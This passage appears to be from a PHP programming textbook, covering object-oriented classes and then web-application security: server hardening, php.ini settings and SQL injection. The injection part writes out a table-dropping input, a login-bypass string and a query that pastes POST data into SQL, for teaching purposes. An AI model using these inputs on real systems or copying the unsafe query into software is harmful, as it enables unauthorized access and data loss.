Methods define what an object can do and are written in the class in the same 
format you’d use to write a function. For example, your CustomerOrder 
might need a method that adds an item onto the total cost of the order. You 
can have a variable called total that contains the current total cost. You can 
write a method that adds the price of an item to the total cost. You could add 
such a method to your class, as follows: 
class CustomerOrder
{
    private $total = 0;

    function addItem($amount)
    {
        $this->total = $this->total + $amount;
        echo "$amount was added; current total is $this->total";
    }
}


This looks just like any other function, but it’s a method because it’s inside 
a class. You can find details about writing functions in Chapter 2 in this 
minibook. 
Like functions, methods accept values passed to them. The values passed
need to be the correct data type to be used in the function. (See Chapter 1 in
this minibook for a discussion of data types.) For instance, in the preceding
example, $amount needs to be a number. Your method should include a
check to make sure that the value is a number. For instance, you might write
the method as follows:

class CustomerOrder
{
    private $total = 0.0;

    function addItem($amount)
    {
        # Accept integers, floats, and numeric strings only
        if(is_numeric($amount))
        {
            $this->total = $this->total + $amount;
            echo "$amount added; current total is $this->total";
        }
        else
        {
            echo "value passed is not a number.";
        }
    }
}

If the value passed is an integer, a float, or a string that is a number, the
amount is added. If not, the error message is displayed. The sum in $total
is a float because it is assigned a number with a decimal point in it. When the
amount passed in is added to $total, it is automatically converted to a float
by PHP.

When you write methods, PHP allows you to specify that the value passed 
must be an array or a particular object. Specifying what to expect is called 
type hinting. If the value passed is not the specified type, an error message 
is displayed. You don’t need to add statements in the method to check for 
array or object data types. For example, you can specify that an array is 
passed to a function, as follows: 

class AddingMachine
{
    private $total = 0;

    function addNumbers(array $numbers)
    {
        # Stop at the last index, which is sizeof($numbers) - 1
        for($i=0;$i<sizeof($numbers);$i++)
        {
            $this->total = $this->total + $numbers[$i];
        }
    }
}
If you attempt to pass a value to this method that is not an array, an error
message similar to the following is displayed.

Catchable fatal error: Argument 1 passed to
AddingMachine::addNumbers() must be an array, integer given,...

This error states that an integer was passed, instead of the required array. 
The error is fatal, so the script stops at this point. You can also specify that 
the value passed must be a specific object, as follows: 

class ShoppingCart
{
    private $items = array();
    private $n_items = 0;

    function addItem( Item $item )
    {
        $this->items[] = $item;
        $this->n_items = $this->n_items + 1;
    }
}



The ShoppingCart class stores the items in the shopping cart as an array
of Item objects. The method addItem is defined to expect an object that
was created from the class Item. If a value is passed to the addItem method
that is not an Item object, an error message is displayed, and the script stops.

Methods can be declared public, private, or protected, just as properties 
can. Public is the default access method if no keyword is specified. 

PHP provides some special methods with names that begin with __ (two
underscores). PHP handles these methods differently internally. This chapter
discusses three of these methods: __construct, __destruct, and __clone. Don’t
begin the names of any of your own methods with two underscores unless
you’re taking advantage of a PHP special method.


Understanding public and private
properties and methods

Properties and methods can be public or private. Public means that methods 
or properties inside the class can be accessed by the script that is using the 
class or from another class. For example, the following class has a public 
property and a public method: 

class Car
{
    public $gas = 0;

    function addGas($amount)
    {
        $this->gas = $this->gas + $amount;
        echo "$amount gallons added to gas tank";
    }
}

The public property in this class can be accessed by a statement in the 
script outside the class, as follows: 


$mycar = new Car; 

$gas_amount = $mycar->gas; 

After these statements are run, $gas_amount contains the value stored in
$gas inside the object. The property can also be modified from outside the
class, as follows:

$mycar->gas = 20; 

Allowing script statements outside the class to directly access the properties
of an object is poor programming practice. All interaction between the
object and the script or other classes should take place using methods. The
example class has a method to add gas to the car. All gas should be added to
the car by using the addGas method, which is also public, using statements
similar to the following:

$new_car = new Car; 

$new_car->addGas(5);

You can prevent access to properties by making them private, as follows: 

private $gas = 0; 


With the property specified as private, a statement in the script that 
attempts to access the property directly, as follows: 

$myCar->gas = 20; 

gets the following error message: 

Fatal error: Cannot access private property car::$gas in c:\testclass.php on line 17

Now, the only way gas can be added to the car is by using the addGas 
method. Because the addGas method is part of the class statement, it can 
access the private property. 

In the same way, you can make methods private or protected. In this case,
you want the outside world to use the addGas method. However, you might
want to be sure that people buy the gas that is added. You don’t want any
stolen gas in the car. You can write the following class:

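class Car
{
    private $gas = 0;

    # Private: can be called only from inside the class
    private function addGas($amount)
    {
        $this->gas = $this->gas + $amount;
        echo "$amount gallons added to gas tank";
    }

    # Public entry point that uses the private method
    function buyGas($amount)
    {
        $this->addGas($amount);
    }
}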


With this class, the only way gas can be added to the car from the outside is 
with the buyGas method. The buyGas method uses the addGas method to 
add gas to the car, but the addGas method can’t be used outside the class 
because it’s private. If a statement outside the class attempts to use addGas, 
as follows, a fatal error is displayed, as it was for the private property: 

$new_car = new Car; 

$new_car->addGas(5); 

However, a statement outside the class can now add gas to the car by using 
the buyGas method, as follows: 

$new_car = new Car; 

$new_car->buyGas(5); 

You see the following output: 

5 gallons added to gas tank 
It’s good programming practice to hide as much of your class as possible.
Make all properties private. You should make methods public only if they
absolutely need to be public.

Writing the constructor

The constructor is a special method, added with PHP 5, that is executed 
when an object is created using the class as a pattern. A constructor isn’t 
required, and you don’t need to use a constructor if you don’t want to set 
any property values or perform any actions when the object is created. Only 
one constructor is allowed. 




The constructor has a special name so that PHP knows to execute the
method when an object is created. Constructors are named __construct
(two underscores). A constructor method looks similar to the following:

function __construct()
{
    $this->total = 0;    # starts with a 0 total
}


This constructor defines the new CustomerOrder. When the order is created,
the total cost is 0.



Prior to PHP 5, constructors had the same name as the class. You might run
across classes written in this older style. PHP 5 and later scripts look first
for a method called __construct() to use as the constructor. If it doesn’t
find one, it looks for a method that has the same name as the class and uses
that method for the constructor. Thus, older classes still run under PHP 5
and 6.


Putting it all together

Your class can have as few or as many properties and methods as it needs. 
The methods can be simple or complicated, but the goal of object-oriented 
programming is to make the methods as simple as is reasonable. Rather than 
cram everything into one method, it’s better to write several smaller methods 
and have one method call another as needed. 

The following is a simple class: 

class MessageHandler
{
    private $message;

    function __construct($message)
    {
        $this->message = $message;
    }

    function displayMessage()
    {
        echo $this->message."\n";
    }
}


The class has one property — $message — that stores a message. The
message is stored in the constructor.

The class has one method — displayMessage. Echoing the stored message
is the only thing the MessageHandler object can do.
Suppose you want to add a method that changes the message to lowercase
and then automatically displays the message. The best way to write that
expanded class is as follows:

class MessageHandler
{
    private $message;

    function __construct($message)
    {
        $this->message = $message;
    }

    function displayMessage()
    {
        echo $this->message."\n";
    }

    function lowerCaseMessage()
    {
        $this->message = strtolower($this->message);
        $this->displayMessage();    # reuse the existing method
    }
}


Note the lowerCaseMessage() method. Because the class already has a
method to display the message, this new lowerCaseMessage() method
uses the existing displayMessage() method rather than repeating the
echo statement.

Any time you write a method and find yourself writing code that you’ve 
already written in a different method in the same class, you need to redesign 
the methods. In general, you shouldn’t have any duplicate code in the same 
class. 

The example in Listing 4-1 is a complicated class that can be used to create 
an HTML form. To simplify the example, the form contains only text input 
fields. 


Listing 4-1: A Script That Contains a Class for a Form Object 

<?php
/*  Class name: Form
 *  Description: A class that creates a simple HTML form
 *               containing only text input fields. The
 *               class has 3 methods.
 */
class Form
{
    private $fields = array();         # contains field names and labels
    private $actionValue;              # name of script to process form
    private $submit = "Submit Form";   # value on submit button
    private $Nfields = 0;              # number of fields added to the form

    /* Constructor: User passes in the name of the script where
     * form data is to be sent ($actionValue) and the value to
     * display on the submit button.
     */
    function __construct($actionValue,$submit)
    {
        $this->actionValue = $actionValue;
        $this->submit = $submit;
    }

    /* Display form function. Displays the form.
     */
    function displayForm()
    {
        echo "\n<form action='{$this->actionValue}'
              method='POST'>\n";
        for($j=1;$j<=sizeof($this->fields);$j++)
        {
            echo "<p style='clear: left; margin: 0; padding: 0;
                  padding-top: 5px'>\n";
            echo "<label style='float: left; width: 20%'>
                  {$this->fields[$j-1]['label']}: </label>\n";
            echo "<input style='width: 200px' type='text'
                  name='{$this->fields[$j-1]['name']}'></p>\n";
        }
        echo "<input type='submit' value='{$this->submit}'
              style='margin-left: 25%; margin-top: 10px'>\n";
        echo "</form>";
    }

    /* Function that adds a field to the form. The user needs to
     * send the name of the field and a label to be displayed.
     */
    function addField($name,$label)
    {
        $this->fields[$this->Nfields]['name'] = $name;
        $this->fields[$this->Nfields]['label'] = $label;
        $this->Nfields = $this->Nfields + 1;
    }
}
?>

This class contains four properties and three methods. The properties are 
as follows: 

♦ $fields: An array that holds the fields as they are added by the user.
The fields in the form are displayed from this array.

♦ $actionValue: The name of the script that the form is sent to. This
variable is used in the action attribute when the form tag is displayed.

♦ $submit: The text that the user wants displayed on the Submit button.
This variable’s value, Submit Form by default, is used when the
Submit button is displayed.

♦ $Nfields: The number of fields that have been added to the form so far.

The methods in this class are as follows:

♦ __construct: The constructor, which sets the values of $actionValue
and $submit from information passed in by the user.

♦ addField: Adds the name and label for the field to the $fields array.
If the user added fields for first name and last name to the form, the
array might look as follows:

$fields[0][name]=first_name
$fields[0][label]=First Name
$fields[1][name]=last_name
$fields[1][label]=Last Name
and so on

♦ displayForm: Displays the form. It echoes the HTML needed for the
form and uses the values from the stored variables for the name of the
field and the label that the user sees by the field.

The next section describes how to use a class, including the Form class 
shown in Listing 4-1. 


Using a Class in a Script 

The class code needs to be in the script that uses the class. Most commonly, 
the class is stored in a separate include file and is included in any script that 
uses the class. 

To use an object, you first create the object from the class. Then that object
can perform any methods that the class includes. Creating an object is called
instantiating the object. Just as you can use a pattern to create many similar
but individual dresses, you can use a class to create many similar but
individual objects. To create an object, use statements that have the following
format:

$objectname = new classname(value, value);

Some valid statements that create objects are 

$Joe = new Person("male");
$car_Joe = new Car("red");
$car_Sam = new Car("green");
$customer1 = new Customer("Smith","Joe",$custID);

The object is stored in the variable name, and the constructor method is 
executed. You can then use any method in the class with statements of the 
following format: 

$Joe->goToWork(); 

$car_Joe->park("illegal"); 

$car_Sam->paintCar("blue"); 

$name = $customer1->getName();

Different objects created from the same class are independent individuals.
Sam’s car gets painted blue, but Joe’s car is still red. Joe gets a parking
ticket, but it doesn’t affect Sam.

The script shown in Listing 4-2 shows how to use the Form class that was 
created in the preceding section and shown in Listing 4-1. 


Listing 4-2: A Script That Creates a Form 

<?php
/*  Script name: buildForm
 *  Description: Uses the form to create a simple HTML form
 */
require_once("Form.class");

echo "<html><head><title>Phone form</title></head><body>";
$phone_form = new Form("process.php","Submit Phone");
$phone_form->addField("first_name","First Name");
$phone_form->addField("last_name","Last Name");
$phone_form->addField("phone","Phone");
echo "<h3>Please fill out the following form:</h3>";
$phone_form->displayForm();
echo "</body></html>";
?>

First, the script includes the file containing the Form class in the script. The
class is stored in the file Form.class. The script creates a new form object
called $phone_form. Three fields are added with the addField method.
The form is displayed with the displayForm method. Notice that some
additional HTML code is output in this script. That HTML could have been
added to the displayForm method just as easily.

The script creates a form with three fields, using the Form class. Figure 4-1 
shows the resulting web page. 
Figure 4-1: The form displayed by the script in Listing 4-2.

Using Abstract Methods in Abstract 
Classes and Interfaces 

You can use abstract methods that specify the information to be passed, 
but do not contain any code, and we tell you how to do that in the following 
sections. Abstract methods were added in PHP 5. You can use abstract methods 
in abstract classes or in interfaces. An abstract class contains both abstract 
methods and nonabstract methods. An interface contains only abstract 
methods. 

Using an abstract class 

Any class that has an abstract method must be declared an abstract class. 
The function of an abstract class is to serve as a parent for a child class. You 
cannot create an object from an abstract class. 

An abstract class specifies the methods for a child class. The child class 
must implement the abstract methods that are defined in the parent class, 
although each child class can implement the abstract method differently, 
with different code. If an abstract method specified in the parent class is not 
included in a child class, a fatal error occurs. 
An abstract method specifies the values to pass, called the signature. The
child implementation of the abstract method must use the same signature.
The child must define the method with the same or weaker visibility. For
example, if the abstract method is declared protected, the child
implementation of the method must be declared protected or public.

The following code shows the use of an abstract class. An abstract class 
named Message is defined. Then two child classes are defined. 

abstract class Message
{
    protected $message_content;

    function __construct($text)
    {
        $this->message_content = $text;
    }

    # No body: each child class must supply its own
    abstract public function displayMessage($color);
}

class GiantMessage extends Message
{
    public function displayMessage($color)
    {
        echo "<h1 style='color: $color'>
              $this->message_content</h1>";
    }
}

class BigMessage extends Message
{
    public function displayMessage($color)
    {
        echo "<h2 style='color: $color'>
              $this->message_content</h2>";
    }
}

The abstract class Message includes an abstract method named
displayMessage. This abstract method is implemented in the two child
classes — GiantMessage and BigMessage. In GiantMessage, the message
content is displayed with an <h1> tag in the color passed to the
method. In BigMessage, the message is displayed with an <h2> tag in the
color passed. Thus, both child classes implement the abstract method, but
they implement it differently.

If a child class doesn’t implement the abstract method, an informative error
message is displayed, stating exactly how many abstract methods are not
implemented and their names. The error is fatal, so the script stops at that
point.

You can implement an interface at the same time you extend a class, including
an abstract class. Using interfaces is described in the next section.

Using interfaces

An interface contains only abstract methods. The function of an interface 
is to enforce a pattern on a class by specifying the methods that must be 
implemented in the class. You cannot create an object from an interface. 

An interface can’t have the same name as a class used in your script. All 
methods specified in an interface must be public. Don’t use the keyword 
abstract for methods in an interface. When a class implements an interface, 
all the methods in the interface must be implemented in the class. If a 
method is not implemented, a fatal error occurs. 

You implement an interface in a class with the following format: 

class classname implements interfacename 

You can implement more than one interface in a class, as follows: 

class classname implements interfacename1, interfacename2,...

Multiple interfaces implemented by a single class may not contain methods 
with the same name. 

The following example shows the use of both inheritance and an interface: 

interface Moveable
{
    function moveForward($distance);
}

class Car
{
    protected $gas = 0;

    function __construct($amt)
    {
        $this->gas = $amt;
        echo "<p>At creation. Car contains $this->gas
              gallons of gas</p>";
    }
}

class Sedan extends Car implements Moveable
{
    private $mileage = 18;

    public function moveForward($distance)
    {
        $this->gas = $this->gas -
                     round(($distance/$this->mileage),2);
        echo "<p>After moving forward $distance miles,
              Sedan contains $this->gas gallons of gas.</p>";
    }
}

The class Sedan is a child of the class Car, which is not an abstract class, 
and also implements the interface Moveable. You can use the preceding 
code with the following statements: 

$my_car = new Sedan(20); 

$my_car->moveForward(50); 

The following displays in the browser window: 

At creation. Car contains 20 gallons of gas 

After moving forward 50 miles, Sedan contains 17.22 gallons of gas

The first statement displays when the object $my_car is created. Because 
the Sedan class doesn’t have a constructor, the constructor in the Car class 
runs and produces the first line of output. The second statement displays 
when the moveForward method is used. 


Preventing Changes to a Class or Method

You might want a class to be used exactly as you have written it. You can 
prevent the creation of a child class that changes the implementation of 
methods with the final keyword, as follows: 

final class classname 

When a class is defined as final, a child class can’t be created. You can 
also define a method as final, as follows: 

final public function moveForward()

If a child class includes a method with the same name as a final method in
the parent class, an error message is displayed, similar to the following:

Fatal error: Cannot override final method Car::moveForward()

In this case, the parent class Car includes a method moveForward that is 
defined as final. The child class Sedan extends Car. However, the Sedan 
class defines a method moveForward, a method with the same name as a 
final method in the parent Car class. This isn’t allowed. 






Handling Errors with Exceptions

PHP provides an error-handling class called Exception. You can use this 
class to handle undesirable things that happen in your script. When the 
undesirable thing that you define happens, code in your method creates an 
exception object. In object-oriented talk, this is called throwing an exception. 
Then, when you use the class, you check whether an exception is thrown 
and perform specified actions. 

You can throw an exception in a method with the following statement: 

throw new Exception("message"); 

This statement creates an Exception object and stores a message in the 
object. The Exception object has a getMessage method that you can use 
to retrieve the message you stored. 

In your class definition, you include code in your methods to create an 
Exception when certain conditions occur. For example, the addGas 
method in the following Car class checks whether the amount of gas 
exceeds the amount that the car gas tank can hold, as follows: 

class Car
{
    private $gas = 0;

    function addGas($amount)
    {
        $this->gas = $this->gas + $amount;
        echo "<p>$amount gallons of gas were added</p>";
        if($this->gas > 50)
        {
            throw new Exception("Gas is overflowing");
        }
    }
}

If the amount of gas in the gas tank is more than 50 gallons, the method 
throws an exception. The gas tank doesn’t hold that much gas. 

When you use the class, you test for an exception, as follows: 

$my_car = new Car();

try
{
    $my_car->addGas(10);
    $my_car->addGas(45);
}
catch(Exception $e)
{
    echo $e->getMessage();
    exit();
}


The preceding script contains a try block and a catch block: 

♦ try: In the try block, you include any statements that you think might 
trigger an exception. In this script, adding too much gas can trigger an 
exception, so you add any addGas method calls inside a try block. 

♦ catch: In the catch block, you catch the Exception object and call 
it $e. Then you execute the statements in the catch block. One of the 
statements is a call to a method called getMessage in the Exception 
class. The getMessage function returns the message that you stored, 
and your statement echoes the returned message. The statements then 
echo the end-of-line characters so the message is displayed correctly. 
The script stops on the exit statement. 

If no exception is thrown, the catch block has nothing to catch, and it 
is ignored. The script proceeds to the statements after the catch block. 
In this case, if the amount of gas doesn’t exceed 50 gallons, the catch 
block is ignored, and the script proceeds to the statements after the 
catch block. 

If you run the preceding script, the following is displayed by the browser: 

10 gallons of gas were added 
45 gallons of gas were added 
Gas is overflowing 

The second addGas method call raised the amount of gas over 50 gallons, so 
an exception was thrown. The catch block displayed the overflow message 
and stopped the script. 
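The addGas method above changes $gas before it checks the limit, so the object still records 55 gallons after the exception is caught, and it also accepts negative amounts. The following added example (not the book's code; GuardedCar, CAPACITY, and getGas are hypothetical names) validates the amount and the limit first and changes the property only when every check passes:

```php
<?php
// Added example, not from the book. GuardedCar, CAPACITY and getGas()
// are names assumed for illustration.
class GuardedCar
{
    const CAPACITY = 50;      // gallons the tank holds, as in the text
    private $gas = 0;

    public function addGas($amount)
    {
        // is_numeric() alone also accepts values such as "-5" and "1e3",
        // so convert and range-check before touching the property.
        if (!is_numeric($amount)) {
            throw new InvalidArgumentException("Amount must be a number");
        }
        $amount = (float) $amount;
        if (!is_finite($amount) || $amount <= 0) {
            throw new InvalidArgumentException("Amount must be greater than 0");
        }
        // Check the limit first so a refused call leaves $gas unchanged.
        if ($this->gas + $amount > self::CAPACITY) {
            throw new OverflowException("Gas is overflowing");
        }
        $this->gas += $amount;
    }

    public function getGas()
    {
        return $this->gas;
    }
}

$car = new GuardedCar();
// Constructed inputs: two valid amounts, one that overflows the tank,
// one negative numeric string, and one non-numeric string.
foreach (array(10, 45, "-5", "abc", 40) as $amount) {
    try {
        $car->addGas($amount);
        echo "added $amount, tank holds {$car->getGas()}\n";
    } catch (InvalidArgumentException $e) {
        // More specific exception classes are caught before general ones.
        echo "rejected input '$amount': {$e->getMessage()}\n";
    } catch (OverflowException $e) {
        echo "refused $amount: {$e->getMessage()}, ",
             "tank still holds {$car->getGas()}\n";
    }
}
echo "final: {$car->getGas()} gallons\n";
```

Because the script catches each exception class separately, it can keep running after bad input and still treat an overflow differently from a malformed amount.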


Copying Objects 

PHP provides a method you can use to copy an object. The method is
__clone, with two underscores. You can write your own __clone method in
a class if you want to specify statements to run when the object is copied. If
you don’t write your own, PHP uses its default __clone method that copies
all the properties as is. As shown by the two underscores beginning its
name, the clone method is a different type of method, and thus is called
differently, as shown in the following example.

You could write the following class: 
class Car
{
    private $gas = 0;
    private $color = "red";

    function addGas($amount)
    {
        $this->gas = $this->gas + $amount;
        echo "$amount gallons added to gas tank";
    }

    # Runs on the copy when the object is cloned
    function __clone()
    {
        $this->gas = 5;
    }
}


Using this class, you can create an object and copy it, as follows: 

$firstCar = new Car; 

$firstCar->addGas(10); 

$secondCar = clone $firstCar; 

After these statements, you have two cars: 

♦ $firstCar: This car is red and contains ten gallons of gas. The ten
gallons were added with the addGas method.

♦ $secondCar: This car is red, but contains five gallons of gas. The
duplicate car is created using the __clone method in the Car class.
This method sets gas to 5 and doesn’t set $color at all.

If you didn’t have a __clone method in the Car class, PHP would use a
default __clone method that would copy all the properties, making
$secondCar both red and containing ten gallons of gas.
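Copying the properties as is means that a property holding another object is copied as a handle to that same object, so the original and the copy go on sharing it. The following added example (not the book's code; GasTank, TankedCar, DeepCopyCar, and their methods are hypothetical names) shows the shared state after a default copy and a __clone method that gives the copy its own object:

```php
<?php
// Added example, not from the book. GasTank, TankedCar, DeepCopyCar and
// their methods are names assumed for illustration.
class GasTank
{
    private $gallons = 0;

    public function add($amount) { $this->gallons += $amount; }
    public function gallons()    { return $this->gallons; }
}

class TankedCar
{
    protected $tank;

    public function __construct()   { $this->tank = new GasTank; }
    public function addGas($amount) { $this->tank->add($amount); }
    public function getGas()        { return $this->tank->gallons(); }

    // The identical operator (===) is true only for the same instance.
    public function sharesTankWith(TankedCar $other)
    {
        return $this->tank === $other->tank;
    }
}

class DeepCopyCar extends TankedCar
{
    public function __clone()
    {
        // Runs on the copy after PHP has copied the properties as is;
        // replace the shared handle with a copy of the tank.
        $this->tank = clone $this->tank;
    }
}

// Default copy: both cars refer to one GasTank object, so gas added
// through the copy also shows up in the original.
$first = new TankedCar;
$second = clone $first;
$second->addGas(10);
echo "default clone: original holds {$first->getGas()}, shared tank: ",
     var_export($first->sharesTankWith($second), true), "\n";

// With __clone: each car has its own tank.
$third = new DeepCopyCar;
$fourth = clone $third;
$fourth->addGas(10);
echo "with __clone:  original holds {$third->getGas()}, shared tank: ",
     var_export($third->sharesTankWith($fourth), true), "\n";
```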


Comparing Objects 

At their simplest, objects are data types. You can compare objects with the 
equal operator, which is two equal signs (==), or with the identical operator, 
which is three equal signs (===). Using the equal operator, two objects are 
equal if they are created from the same class and have the same properties 
and values. However, using the identical operator, two objects are identical 
only if they refer to the same instance of the same class. 

The following two objects are equal, but not identical, because they are two 
instances of the class Car: 

$my_car = new Car(); 

$my_car2 = new Car(); 
Thus, the following statement would echo equal:

if($my_car == $my_car2)
{
    echo "equal";
}

But, the following statement would not echo equal:

if($my_car === $my_car2)
{
    echo "equal";
}

The following two objects are equal, but not identical, because clone
creates a new instance of the object Car:

$my_car = new Car();
$my_car2 = clone $my_car;

The following two objects are both equal and identical:

$my_car = new Car();
$my_car2 = $my_car;


Getting Information about Objects and Classes 

PHP provides several functions that you can use to get information about 
objects and classes: 

♦ You can check whether a class exists with the following:

class_exists("classname");

♦ You can test whether a property exists in a specific class with the
following:

property_exists("classname","propertyname");

♦ You can find out the properties, with their defaults, and the methods
defined in a class with the following statements:

get_class_vars("classname");
get_class_methods("classname");

The get_class_ functions return an array. The properties array
contains the property name as the key and the default as the value. The
methods array contains numeric keys and the names of the methods as
values. If a property or method is private, the function will not return its
name unless it is executed from inside the class.

♦ You can test whether an object, its parents, or their implemented
interfaces were created by a specified class using the instanceof
operator, added in PHP 5, as follows:

if($objectname instanceof classname)

♦ You can find out the current values of the properties of an object with
the following function:

get_object_vars($objectname);

The function returns an array containing the current values of the
properties, with the property names as keys.


Destroying Objects 

You can destroy an object with the following statement: 

unset($objName); 

For example, you can create and destroy an object of the Car class with the 
following statements: 

$myCar = new Car; 
unset($myCar); 

After $myCar is unset, the object no longer exists at all. 

PHP provides a method that is automatically run when an object is
destroyed. You add this method to your class and call it __destruct (with
two underscores). For example, the following class contains a __destruct
method:

class Bridge
{
    function __destruct()
    {
        echo "The bridge is destroyed";
    }
}

If you use the following statements, the object is created and destroyed: 

$bigBridge = new Bridge; 
unset($bigBridge); 

The output from these statements is

The bridge is destroyed

The output is echoed by the __destruct method when the object is unset.
The __destruct method isn’t required. It’s just available for you to use
if you want to execute some statements when the object is destroyed. For
example, you might want to close some files or copy some information to
your database.
In This Chapter

Securing the Server and the Apache web server
Configuring PHP securely
Handling errors safely
Sanitizing variables


As a web developer, you need to ensure that your web application is
secure. If you’re also performing administration duties on the server,
then you need to secure the server as well. Securing the application means
making sure any and all inputs from users are sanitized, or checked, against
values that you know are good and not allowing any input into the program
unless you’ve programmatically checked it. Securing the server means
attempting to keep the web application in its own virtual sandbox, so that if
the server is compromised the damage is limited.

This chapter discusses security for web applications. You look both at 
server security and application security. 


Securing the Server 

The server itself should be secured. This usually means hardening the 
server and ensuring that the server uses a firewall. 

Hardening the server 

Typically this means hardening the operating system by uninstalling 
unnecessary services. For example, there’s typically no reason to run a print server 
on the same server that runs the public website. 

Disabling and uninstalling unnecessary services reduces the footprint of the 
server, which means that there are fewer things for an attacker to exploit. 

Tools like SELinux and grSecurity also enhance the security of a server and 
reduce the ability of successful attackers to compromise more than 
their own little sandboxes. 

Using a firewall 

Whether you use a firewall on the server itself or use a firewall at the point 
where the Internet meets your network, or both, you should make sure that 
there’s a firewall blocking connections to all ports except those specifically 
allowed, such as TCP ports 80 and 443 for a typical web server. 

A better scenario is to run the firewall both at the ingress point (the point 
where the Internet meets your network) and on the server itself. Doing so 
means that the web server will be protected even if an attacker finds another 
way into the network. 

All major operating systems include built-in firewall tools and they’re both 
easy to set up and easy to maintain. 


Securing Apache 

Securing the Apache web server is a pretty broad topic, so rather than try to 
fit everything into one section, we focus on two ways to make Apache more 
secure when it’s running PHP applications: using SuExec and mod_security. 
If you’re using a third-party hosting provider, then you won’t be able to 
install SuExec or mod_security but rather will rely on the hosting provider 
for (and let them worry about) server security. 

Securing PHP applications with SuExec 

If your application runs on Apache (as more than half the websites on the 
Internet do), you may want to consider enabling SuExec in your Apache 
configuration. SuExec is a mechanism that is bundled with Apache that causes 
scripts to be run as the user that owns the script, rather than running them 
as the web server user. 

In a non-SuExec environment, all scripts are run as the same user ID as the 
web server itself. Unfortunately, one vulnerable script can give a malicious 
user back-door access to the entire web server, including scripts running on 
other sites hosted on the same server. 

SuExec attempts to mitigate this problem by restricting web applications to 
their own areas and running them under their owners’ user IDs, rather than 
under the web server’s user ID. For example, this script would run under the 
user ID of jsmith: 

/home/~jsmith/public_html/scripts/please_hack_me.php 

A malicious user could exploit this script, but he or she would have access 
only to files and programs that the jsmith user is allowed to use. Every 
other user on the server would be protected from jsmith’s insecure script. 

Unfortunately, getting SuExec to work properly with virtual hosts, or multiple 
independent websites physically located on the same web server, can be 
tricky. SuExec is designed to run scripts that exist in the web server’s 
document root. Most virtual hosts are set up in a way that gives each individual 
website its own document root, and each site’s document root isn’t located 
under the web server’s document root. To get around this restriction, the 
system administrator must add each virtual host’s document root to the 
web server’s document root variable in the Apache configuration file. 

SuExec also requires that PHP scripts be run as Common Gateway Interface 
(CGI), which is slower than running PHP as a precompiled module under 
Apache. CGI was the first workable model for web applications, and it is still 
used for simple scripts. However, once you leave the realm of PHP scripting 
and start writing full-fledged applications, you’ll need the performance boost 
of precompiled PHP. 

For fairly simple web servers, SuExec can keep one insecure application from 
trampling all over everything else. However, in a more complex environment 
with virtual servers, precompiled modules, and dozens or hundreds of users, 
you need a security model that is a bit more robust. mod_security (which we 
cover in the next section) is a giant leap forward in web server security, 
especially for servers that run virtual servers and precompiled PHP. 

mod_security is an open-source module that no Apache server should run 
without. It’s a robust filtering engine that watches incoming requests (both 
GET and POST) and weeds out the ones that are likely to cause problems for 
the server and its applications. If your server is running SuExec, mod_security 
is a great first line of defense — and you can never have too many lines 
of defense when it comes to web server security! 

mod_security works by intercepting all traffic bound for your web server. It 
compares the traffic to a set of rules to determine whether to stop each 
individual packet or allow it to proceed to the web server. Think of it as having 
your own personal bouncer standing at the door to your server. 

Out of the box, mod_security comes with a set of core rules designed to 
protect servers from most generic attacks. You can add your own rules as you 
need them to respond to specific attacks on your applications. 

Unfortunately, Apache doesn’t come with mod_security, so you have to get it 
yourself. Luckily, it’s open source and available from www.modsecurity.org. 


Setting Security Options in php.ini 

The php.ini file has a number of security-related options. Table 5-1 
explains the recommended setting for each option. See Book VII, Chapter 1 
for more information on the php.ini file. 


Table 5-1 Recommended Security Settings for php.ini 

Option                      Description 

safe_mode = on              Limits PHP scripts to accessing only files owned by 
                            the same user that the script runs as, preventing 
                            directory traversal attacks. 

safe_mode_gid = off         This setting, combined with safe_mode, allows PHP 
                            scripts access only to files for which the owner 
                            and group match the user/group that the script is 
                            run as. 

open_basedir = directory    When this parameter is enabled, the PHP script can 
                            access only files located in the specified 
                            directories. 

expose_php = off            Prevents PHP from disclosing information about 
                            itself in the HTTP headers sent to users. 

register_globals = off      If this parameter is enabled, all environment, GET, 
                            POST, cookie, and server variables are registered 
                            as globals, making them easily available to 
                            attackers. Unless you have no other options but to 
                            enable it, you should leave register_globals off. 

display_errors = off        Prevents PHP errors and warnings from being 
                            displayed to the user. Not only do PHP warnings 
                            make your site look unprofessional, but they also 
                            often reveal sensitive information, such as 
                            pathnames and SQL queries. 

log_errors = on             When this parameter is enabled, all warnings and 
                            errors are written to a log file in which you can 
                            examine those warnings and errors later. 

error_log = filename        Specifies the name of the log file to which PHP 
                            should write errors and warnings. 


Handling Errors Safely 

In an ideal world, when you create a form that asks users to type in their first 
name, you can reasonably expect that they will enter something like John 
or Jane. Unfortunately, you also get users who leave the form blank, type in 
their address, or simply enter a random string of characters. And those are 
the benign users. Attackers enter things into your form for nefarious purposes. 
Consider the following information on how the bad guys operate and how to 
stay one step ahead of them. 

Understanding the dangers 

Attackers use different methods to put your website at risk. One type of 
attack is called SQL injection. In this attack, an attacker assumes that the 
information collected in a form is going to be used in a SQL query and 
executed against your database. The attacker types characters into your form 
field that can cause you problems when used in a query. 

For example, the attacker might enter something like John; drop%20table%20users. 
If your application is set up to enter users’ names into the 
database, your SQL query would look something like 

INSERT INTO users VALUES (John; drop table users); 

Depending on your server configuration, the server might read that query 
and merrily go about dropping the users table from your database. It might 
complain about the syntax a little, but if you have a loose database 
configuration, it will do exactly what that line of code tells it to: Add “John” to the 
users table, and then drop the table named users. Not good. 

In another example of SQL injection, characters are entered into the 
username field of a form to bypass authentication. Suppose the user types the 
following characters into the username field: 

John' OR 'foo' = 'foo' -- 

Your script might contain the following statement to test the username and 
password: 

$sql = "SELECT * FROM User WHERE userID = '$_POST[userID]' 
        AND password = '$_POST[password]'"; 

If you insert the code that the user types in, without changing it, you have 
the following SQL query: 

$sql = "SELECT * FROM User WHERE username = 'John' OR 'foo' = 
'foo' -- ' AND password = '$_POST[password]'"; 

This query allows the user to log in without a valid username or password. In 
the first phrase in the WHERE clause, the foo = foo is true. Then, the -- 
makes the rest of the query into a comment, effectively invisible in the 
query. Consequently, this query always matches a row. 
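
The login query above, placed next to a parameterized version and run against an in-memory SQLite table so that it is self-contained. This is an added example, not code from the book: the use of PDO and SQLite, the function names, and the single constructed row are assumptions, and it needs PHP 7 or later with the pdo_sqlite extension.

```php
<?php
// Added example: PDO/SQLite, function names and the sample row are assumptions.

function make_demo_db(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec("CREATE TABLE User (userID TEXT PRIMARY KEY, password TEXT)");
    // Constructed row. A real table stores the output of password_hash(),
    // never the password itself.
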